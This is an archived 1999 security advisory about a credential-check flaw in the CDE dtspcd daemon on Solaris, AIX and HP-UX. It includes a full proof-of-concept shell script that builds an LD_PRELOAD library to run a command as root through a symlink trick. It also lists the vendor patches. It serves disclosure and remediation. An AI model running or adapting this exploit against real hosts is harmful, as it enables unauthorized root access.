Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Unix :: General :: unix4164.htm

dtspcd insufficient client credentials check



15th Sep 1999 [SBWID-4164]
COMMAND

	    dtspcd

	

	

SYSTEMS AFFECTED

	    Solaris 2.x, 7, AIX, 4.1.x, 4.2.x, 4.3.x, 

	    HP9000 Series 700/800 running HP-UX releases 10.10, 10.20, 10.24, 11.00, 

	    11.04, and 11.11.

	

	

	

	

PROBLEM

	    Job de Haas found following.  He discovered the following security

	    problem  in  dtspcd,  part  of  CDE.   The  CDE  subprocess daemon

	    /usr/dt/bin/dtspcd  contains  an  insufficient  check  on   client

	    credentials.   The insufficient  check can  lead to  a local  root

	    compromise.

	

	    The  CDE  subprocess  daemon  allows  cross-platform invocation of

	    applications. To achieve this it is registered by inetd:

	
	        dtspc stream tcp nowait root /usr/dt/bin/dtspcd /usr/dt/bin/dtspcd

	

	        dtspc           6112/tcp                        # CDE subprocess control

	

	    In order to authenticate the  remote user, the daemon generates  a

	    filename which is to be created by the client and then is verified

	    by the daemon.  When  verifying the created file, the  daemon uses

	    stat()  instead  of  lstat()  and  is subsequently vulnerable to a

	    symlink attack.   Further more  the daemon  seems to  allow  empty

	    usernames  and  then  reverts  to  a publicly write-able directory

	    (/var/dt/tmp).  Job discovered  this accidentally, but later  read

	    that also  unreadable home  directories result  in this  behavior.

	    The process can  be followed fairly  well by setting  the -log and

	    -debug options on dtspcd (in  /etc/inetd.conf).  It will create  a

	    log file  in /var/dt/tmp/DTSPCD.log.   This will  show information

	    like:

	

	        --> REGISTER channel: 0, request: 4, length: 33, seq: 1 data: 4

	             Client protocol version is \'1000\'.: Mon Sep 13 10:32:33 1999

	        +++> Authentication file is \'/var/dt/tmp/.SPC_AAA0RIUwK\'.: Mon Sep 13 ..

	

	    Both  these  bugs  can  be  combined  to convince dtspcd it should

	    execute  an  action  as  root.   The  script  below  performs  all

	    necessary actions on a Solaris host.  It makes use of the dtaction

	    command of which the behavior is modified by pre-loading a  shared

	    library with modified libc functions.

	

	    Another feature of dtspcd, which was not obvious to me, is that it

	    will allow remote  access to all  systems that share  NFS exported

	    home directories without requesting a password.  Shell script:

	
	    #!/bin/sh

	    #

	    # dtspaced

	    # Demonstration of local root hole with dtspcd.

	    # Job de Haas

	    # (c) 1999 ITSX bv

	    #

	    # Mechanism is as follows:

	    #   - dtaction requests the action \'Execute\' through dtspcd.

	    #   - dtscpd request a filename to be created which it will check for

	    #     owner/suid bit.

	    #   - BUG1: dtspcd allows creation in a public directory (with empty

	    #           username).

	    #   - BUG2: and forgets to check if the file is a symlink.

	    #   - dtaction will create a symlink to a suid root binary and reply.

	    #   - dtspcd considers dtaction authenticated and executes requested file

	    #     as root.

	    #

	    # suggested fix: use lstat or refuse a symlink and why allow an empty

	    #                username?

	    #

	    # exploit uses a shared lib to replace some functions to do what we want.

	    # Note that these are not used by dtspcd but by dtaction. The script executed

	    # by dtaction as root creates a file /tmp/root_was_here.

	    #

	    # tested on Solaris 2.5.1, 2.6 and 7

	    #

	    

	    if [ -f /tmp/root_was_here -o -d /tmp/root_was_here ]; then

	       echo \"/tmp/root_was_here already exists\"

	       exit

	    fi

	    

	    if [ \"X$DISPLAY\" = \"X\" ]; then

	       echo \"need to set DISPLAY\"

	       exit

	    fi

	    

	    cat > /tmp/dtspaced.c << EOF

	    #include <pwd.h>

	    #define O_CREAT 0x100

	    #define O_RDONLY 0

	    

	    #if __SunOS_5_5_1

	    #define open64  open

	    #define _open64 _open

	    #endif

	    

	    open64(const char * filename, int flag, int mode)

	    {

	        if ((flag & O_CREAT) && ( strstr( filename, \"SPC\") )) {

	            symlink( \"/usr/bin/passwd\", filename);

	            filename = (char *)strdup(\"/tmp/shit\");

	            unlink(filename);

	        }

	        return(_open64(filename, flag, mode));

	    }

	    

	    chmod(const char * filename, int mode)

	    {

	        _chmod( filename, mode);

	        return(0);

	    }

	    

	    struct passwd *getpwuid(uid_t uid)

	    {

	        struct passwd *pw;

	    

	        pw = (struct passwd *)_getpwuid(uid);

	        pw->pw_name = (char *)strdup(\"\");

	        return(pw);

	    }

	    EOF

	    

	    cat > /tmp/doit << EOF

	    #!/bin/sh

	    unset LD_PRELOAD

	    /usr/bin/touch /tmp/root_was_here

	    EOF

	    

	    chmod a+x /tmp/doit

	    

	    mkdir /tmp/.dt

	    cat > /tmp/.dt/hack.dt << EOF

	    

	    set DtDbVersion=1.0

	    

	    ACTION Execute

	    {

		    LABEL		Execute

	            TYPE            COMMAND

	            WINDOW_TYPE     NO_STDIO

	            EXEC_STRING     

		      \"%(File)Arg_1\"File To Execute:\"%\"

		    DESCRIPTION	The Execute action runs a shell script or 

	                            binary executable. It prompts for options and 

	                            arguments, and then executes the script or 

	                            executable in a terminal window.

	    }

	    EOF

	    

	    DTDATABASESEARCHPATH=/tmp/.dt

	    export DTDATABASESEARCHPATH

	    

	    # make a copy of dtaction so it is not suid root and will accept LD_PRELOAD

	    cp /usr/dt/bin/dtaction /tmp

	    

	    echo \"Compiling shared lib...\"

	    cc -c /tmp/dtspaced.c -o /tmp/dtspaced.o

	    ld -G /tmp/dtspaced.o -o /tmp/dtspaced.so

	    

	    LD_PRELOAD=/tmp/dtspaced.so

	    export LD_PRELOAD

	    

	    echo \"Executing dtaction...\"

	    /tmp/dtaction -execHost 127.0.0.1 Execute /tmp/doit

	    unset LD_PRELOAD

	    

	    /bin/rm -f /tmp/doit /tmp/dtaction /tmp/shit /tmp/dtspaced.*

	    /bin/rm -rf /tmp/.dt

	    

	    if [ -f /tmp/root_was_here ]; then

	       echo \"created file /tmp/root_was_here\"

	    else

	       echo \"exploit failed...\"

	    fi

	

SOLUTION

	    IBM

	    ===

	      The following APARs will be available soon:

	
	        AIX 4.1.x:  IY03125  IY03847

	        AIX 4.2.x:  IY03105  IY03848

	        AIX 4.3.x:  IY02944  IY03849

	

	    Customers that do  not require the  CDE desktop functionality  can

	    disable CDE by restricting access to the CDE daemons and  removing

	    the dt entry  from /etc/inittab.   For customers that  require the

	    CDE  desktop  functionality,  a  temporary  fix  is  available via

	    anonymous ftp from:

	
	        ftp://aix.software.ibm.com/aix/efixes/security/cdecert.tar.Z

	

	    Sun Microsystems

	    ================

	      The following patches are available:

	
	        CDE version         SunOS version                   Patch ID

	        ___________         _____________                   _________

	        1.3                 5.7                             108221-01

	        1.3_x86             5.7_x86                         108222-01

	        1.2                 5.6                             108199-01

	        1.2_x86             5.6_x86                         108200-01

	        1.0.2               5.5.1, 5.5, 5.4                 108205-01

	        1.0.2_x86           5.5.1_x86, 5.5_x86, 5.4_x86     108206-01

	        1.0.1               5.5, 5.4                        108252-01

	        1.0.1_x86           5.5_x86, 5.4_x86                108253-01

	

	For newer os release :
	

	    OS Version               Patch ID

	    __________               _________

	    SunOS 5.8                108949-07

	    SunOS 5.8_x86            108950-07

	    SunOS 5.7                106934-04

	    SunOS 5.7_x86            106935-04

	    SunOS 5.6                105669-11

	    SunOS 5.6_x86            105670-10

	    SunOS 5.5.1              108363-02

	    SunOS 5.5.1_x86          108364-02

	

	

	    Santa Cruz Operation (SCO) and SGI are investigating the issue.

	

	 Update

	 ======

	

	 HP-UX patch :

	 

	 ftp site: hprc.external.hp.com (192.170.19.51).

	 account: dtspcd

	 password: dtspcd

	 file: dtspcd.tar.gz

	 or ftp://dtspcd:dtspcd@hprc.external.hp.com/dtspcd/

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH